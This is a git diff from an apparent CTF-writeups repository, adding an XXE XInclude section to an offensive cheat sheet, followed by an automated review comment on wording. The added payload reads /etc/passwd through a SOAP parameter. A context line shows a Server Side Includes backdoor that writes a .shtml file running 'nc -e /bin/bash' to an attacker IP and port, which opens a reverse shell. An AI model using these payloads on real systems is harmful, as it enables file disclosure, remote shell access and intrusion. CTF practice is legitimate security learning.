mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 12:03:03 +00:00
Update Cheat Sheet.md
parent
04b4585956
commit
31f1cacbb9
1 changed files with 8 additions and 0 deletions
|
@ -558,6 +558,14 @@ Also to check `/etc/nginx/sites-available/default`
|
|||
|
||||
To see list of processes running on the system we can read this file `/proc/sched_debug`
|
||||
|
||||
### XXE - XIncludes Attack
|
||||
|
||||
We can use XInclude when SOAP is being used in an application and we can't introduce DTD , so we'll have to replace a value of a paramter with <br/>
|
||||
```
|
||||
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
|
||||
<xi:include parse="text" href="file:///etc/passwd"/></foo>
|
||||
```
|
||||
|
||||
### SSI (Server Side Includes)
|
||||
|
||||
` echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml`
|
||||
|
|
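Review bot: The sentence added under "### XXE - XIncludes Attack" trails off at "replace a value of a paramter with <br/>": "paramter" is misspelled, there is a stray space before the comma in "DTD ,", and the trailing `<br/>` stands in for a colon before the fenced block. Suggest ending it "...so we replace the value of a parameter with:" and tagging the fence as `xml`. The "### SSI (Server Side Includes)" section, unlike the one above it, has no description, and its inline code begins with a stray space after the opening backtick. Add one sentence stating what the `.shtml` line is for, and write the placeholders as `<IP> <PORT>` so they are not read as literal values.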